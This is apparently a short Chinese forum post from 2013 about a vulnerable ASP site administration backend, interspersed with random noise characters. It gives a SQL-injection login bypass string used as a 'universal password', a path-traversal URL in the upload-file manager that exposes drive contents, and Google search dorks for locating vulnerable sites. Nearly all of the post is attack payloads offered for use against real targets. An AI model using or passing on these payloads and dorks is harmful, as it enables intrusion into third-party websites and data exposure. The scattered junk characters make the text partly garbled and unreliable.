后台万能密码 'or'='or'' q, j$ I% u7 _4 S$ P7 a+ w0 u
5 a6 O6 R+ F) d6 R X( z- K后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!0 K0 S0 B- R; G
admin/uploadfile.asp?currentFolder=/upfiles/../6 T! Z: `. A, E p$ ?
. [* u3 v( s+ k7 e漏洞证明:" |$ t* {9 {5 `, _) W
, [( D; F/ U" Y1 R, M E谷歌:inurl:type.asp?id=1 新闻中心
- y8 A% o% J& v7 ]. S或者 :inurl:download_ok.asp?
$ L; C$ f) g% f1 j. @: @3 i, f0 |7 n" _
|
发表于 2013-3-14 20:17:32
收藏
支持
反对